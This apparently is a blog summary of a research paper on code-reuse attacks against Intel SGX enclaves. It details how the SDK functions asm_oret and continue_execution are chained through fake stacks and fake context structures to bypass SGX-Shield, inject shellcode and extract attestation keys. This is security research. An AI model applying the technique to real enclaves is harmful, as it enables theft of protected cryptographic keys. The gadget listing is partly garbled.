The Guard's Dilemma

Posted on 2019-02-25 Edited on 2021-05-22 In paper

Introduction

SGX isolates sensitive code and data from the OS, hypervisor, BIOS and other applications. Besides, SGX code and data is always encrypted as soon as it leaves the CPU. sensitive data, e.g. cryptographic keys, of applications is protected by SGX containers called enclaves, which can be dynamiclly created while the applications, known as hosts, is running. enclaves provide predefined entry points to hosts performing sensitive computation.

Ideally, the enclave code only includes minimal carefully-inspected code, which could be formally proven to be free of vulnerabilities. However, legacy applications can be adapted as well to run inside SGX enclaves with necessary modifications. Formally proving or manually inspecting legacy applications is not feasible, meaning that memory corruption vulnerabilities occurs in enclaves with high probability.

Recently, Dark-ROP[1] was proposed to leverage memory-corruption against SGX. Dark-ROP is based on several oracles, which inform the attackers about the internal status of encalves, and return-oriented programming. However, Dark-ROP requires a non-randomized memory layout to locate secret code and data after crashing. Therefore, an implementation of SGX randomization called SGX-Shield[2] mitigates Dark-ROP attack.

However, SGX-Shield does not randomize the part of SGX SDK that handles transitions between host code and enclave code, which contains a number of gadgets to mount a ROP attack. This paper demonstrates that the interface code is enough to mount powerful run-time attacks and bypass SGX-Shield without requiring kernel privileges.

The Guard’s Dilemma

Controlling registers is essential in any code-reuse attack, which can prepare data for subsequent gadgets or set arguments for function calls. Thus, attackers always use specific register-setting gadgets, e.g. pop gadgets, to control registers. But, this paper allows attacker to use whole functions in tRTS as building blocks instead of small gadgets. Here lies the dilemma: the SDK is an important part in creating enclaves, but in this case it is actually exposing them to attacks.

two new exploitation primitives:

The ORET primitive allows attacker to gain access to a critical set of CPU registers by exploiting a stack overflow vulnerability.
The CONT primitive allows attacker to gain access to all general-purpose registers, with the control of a register (on x86_64, rdi).

Overview and Attack Workflow

Primitives

ORET primitive. asm_oret function is used to restore the CPU context after a OCALL. Once the attacker control the instruction pointer(hijacking control flow) and stack contents, e.g. stack overflow or format string, she can set a subset of CPU registers, e.g. rdi, rip.
CONT primitive. continue_execution function is meant to restore CPU context after an exception. The prerequisite is calling this function with a controlled rdi register, e.g. exploiting a memory corruption affecting a function pointer. The attacker can control over all general-purpose CPU registers.
ORET+CONT loop. the basic idea behind the attack is to use CONT primitive repeatedly to invoke the various gadgets with correct register values.

Each iteration of this loop executes one gadget and is stuctured as follows:

A CONT primitive manipulates the stack pointer to hijack it into attack-controlled memory and executes a gadget.
Once the gadget completes, the previous stack manipulation cause the execution of an ORET primitive.
The ORET primitive triggers the CONT primitive for next gadget, continuing the cycle from the first step.

Workflow

Payload preparation
The attack performs static analysis on the enclave binary to determine the gadgets in the non-randomized part of binary, e.g. tRTS. Next, she construct a gadgets chain and defines the register states that should be set before executing each gadget, e.g. function argument register. According to Threat Model, attacker knows the memory address layout, including enclave binary offset. Also, she has to determine the offset of asm_oret and continue_execution(both in tRTS).
Fake structures preparation
The primitives work by abusing functions intended to restore CPU contexts by tricking them into restore fake contexts. Contrast to a standard ROP exploit, attacker requires a number of memory structures to hold the fake context and execution primitives.

Multiple fake exception information structures
Fake stack is a supporting structure for the ORET+CONT loop that serves two purpose. On the one hand, it is used to bring control back to an ORET primitive after a gadget executes. On the other one hand, it contains fake context for the transition from the ORET primitive to the CONT primitive to continue the loop.

Attack execution
When the vulnerability satisfies the CONT preconditions (e.g., exploitation of an indirect function call), the attacker can execute the first CONT directly. When the vulnerability satisfies the ORET preconditions (e.g., stack overflow), the attacker can set the first function argument register and the instruction pointer.

Details

ORET Primitives

ORET primitive abuses the asm_oret function to restore CPU context from the OCALL frame saved on the stack. The prototype of this function is:

1	sgx_status_t asm_oret(uintptr_t sp, void *ms);

the first argument (sp) points to the OCALL frame, which contains the partial CPU context to be restored, including saved values for rbp, rdi, rsi, and r12 to r15.

typedef struct _ocall_context_t {
  uintptr_t r15;
  uintptr_t r14;
  uintptr_t r13;
  uintptr_t r12;
  uintptr_t xbp;  //rbp
  uintptr_t xdi;  //rdi
  uintptr_t xsi;  //rsi
  uintptr_t xbx;  //rbx

  uintptr_t ocall_ret
} ocall_context_t;

Attacker able to control the OCALL frame can set all registers mentioned; moreover, the new instruction pointer (rip) can also be set.

The values of rsp and rip after asm_oret depend on the SGX SDK version. For versions earlier than 2.0, the stack pointer is set to point to the ocall_ret field before issuing a ret instruction. Hence, the new instruction pointer will be the value of ocall_ret, and the new stack pointer will pointer to the memory location immediately following the OCALL frame.

From the version 2.0, a more traditional epilogue is used: the base pointer(rbp) is moved into rsp, the rbp is popped from the stack, and finally a ret is issued. Therefore, rbp in the OCALL frame points to a memory area containing two 64-bit words: the new value for rbp, and the return address(new instruction pointer).

The first operation done by asm_oret is shifting rsp to the sp argument, i.e., the top of OCALL frame. A attacker can jump to the code after the function prologue and let asm_oret believe that the OCALL frame is at the top of the current stack. It is always possible to abuse asm_oret to restore a fake OCALL frame at the top of the stack, without the need to control the first argument, by jumping to an appropriate instruction inside asm_oret.

An attacker who has control over the stack contents can reuse asm_oret to set the registers. The application is vulnerable to a buffer overflow error on the stack. The attacker exploits this to overwrite the return address with the address of asm_oret, properly adjusted to account for skipped instructions. Moreover, she places a fake ocall_context_t immediately after the return address. Once function call returns, control is transferred to asm_oret with the fake OCALL frame at the top of stack.

CONT Primitive

The CONT primitive is based on exception handle function continue_execution, which used to restore CPU context from a exception information structure.

1	continue_execution(sgx_exception_info_t *info);

typedef struct _sgx_exception_info_t {
  sgx_cpu_context_t       cpu_context;
  sgx_exception_vector_t  exception_vector;
  sgx_exception_type_t    exception_type;
}sgx_exception_info_t;

typedef struct _cpu_context_t {
  uint64_t  rax;
  uint64_t  rcx;
  uint64_t  rdx;
  uint64_t  rbx;
  uint64_t  rsp;
  uint64_t  rbp;
  uint64_t  rsi;
  uint64_t  rdi;
  uint64_t  r8;
  //...
  uint64_t  r15;
  uint64_t  rflags;
  uint64_t  rip;
} cpu_context_t;

Note that the stack pointer(rsp) and the instruction pointer(rip) are part of this context, attacker can control stack pointer and hijack it to attacker-controled memory(fake stack). This technique is known as stack pivoting.

As a example, continue_execution can be reused by corrupting a function pointer and hijacking it to it, moreover the attacker needs to control rdi or the memory pointed to by rdi.

Fake stack

The fake stack is used to chain CONT to ORET, and it is composed of a sequences of frames, which consists of the address of asm_oret(properly adjusted) followed by an ocall_context_t structure. The CONT in the loop invokes a gadget with stack pointer set to the top of fake stack. The address of asm_oret will be at the top of the stack before gadget return. Therefore, the gadget will return to asm_oret, launching an ORET primitive and restore the fake context from frame. The fake context is set up so the rdi points to a fake exception structure and the instruction pointer is set to continue_execution.

Fake exception information

For each gadget, the attack sets up a fake sgx_exception_info_t structure with desired register values and instruction pointer to the gadget’s address. The stack pointer is set to the top of fake stack.

Attacking SGX-Shield

Overview on SGX-Shield

Fine-grained randomization
Software DEP
Software Fault Isolation
Coarse-grained Control Flow Integrity

Because SGX-Shield needs writable code pages during loading, the enclave code will stay writable for the whole enclave’s lifecycle.

Exploit

Assumption: a stack overflow vulnerability in the enclave.
Observation: SGX-Shield enclaves feature writable code pages.
Idea: the first stage, based on code reuse, injects the second-stage code, also known as shellcode.

First stage

Payload preparation. The attacker starts by determining the offsets of asm_oret and continue_execution. Next, for the code-injection attack, the attackers needs a gadget (from do_rdrand function in tRTS) to write to memory.
1
2
3
mov eax, (rcx)
mov 1 , eax
ret
Our chain repeatedly invoke this gadget to write the shellcode 4 bytes a time. The address to place the shellcode at is taken from the writeable SGX-Shield code pages.
Fake structures preparation. The attacker starts by creating a fake stack that contains the address of continue_execution repeated n-1 times, where n is the number of gadgets in the chain. A sgx_exception_info_t structure is set up for all registers, with rip is set up for the shellcode’s address and the other registers at the attacker’s discretion.
Attack execution. The attacker triggers the stack overflow in the enclave. She overwrites a return address with the address of asm_oret, and place a fake ocall_context_t after the address. The ocall_ret set to the address of continue_execution and the rdi set to the fake sgx_exception_info_t as the argument. This will result in continue_execution being called on fake exception structure, which starts the chain. The fake exception structure set up the rip to gadget’s address, the rax and rcx to proper value to place attacker’s code in SGX-Shield code pages. The rsp will point at fake stack, which are all continue_execution.

Second stage

The Shell code has full control over the enclave. In this case, attacker extract cryptographic keys used during remote attestation process through the shellcode. Therefore, she can sent these keys to remote server.